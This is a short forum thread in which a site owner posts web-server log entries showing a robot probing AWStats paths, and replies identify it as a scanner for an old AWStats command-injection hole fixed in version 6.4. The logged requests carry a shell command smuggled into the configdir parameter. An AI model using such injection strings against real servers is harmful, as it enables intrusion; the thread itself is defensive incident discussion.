The logfile entries certainly look suspicious: 208.64.39.53 - - [16/Jan/2006:20:10:31 -0700] "GET //cgi-bin/awstats/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 208.64.39.53 - - [16/Jan/2006:20:10:32 -0700] "GET //cgi-bin/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 281 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 208.64.39.53 - - [16/Jan/2006:20:10:32 -0700] "GET //cgi/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 277 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 208.64.39.53 - - [16/Jan/2006:20:10:32 -0700] "GET //awstats/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 200 697 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 208.64.39.53 - - [16/Jan/2006:20:10:33 -0700] "GET //cgi-bin/stats/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 208.64.39.53 - - [16/Jan/2006:20:10:33 -0700] "GET //stats/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 279 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 208.64.39.53 - - [16/Jan/2006:20:10:33 -0700] "GET //awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 208.64.39.53 - - [16/Jan/2006:20:10:33 -0700] "GET / HTTP/1.1" 301 231 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" Code (markup):
For sure, it is a robot looking for vulnerabilities. According to the AWStats web site, there is no known security hole in versions 6.4 and newer. Jean-Luc
Awstats 6.3 and earlier had a nasty vulnerability. There have been automated scanners out there looking to exploit it for some time now..
The current stable version does not have any known issues. Previous versions had several nasty holes in them that led to some "lovely" side effects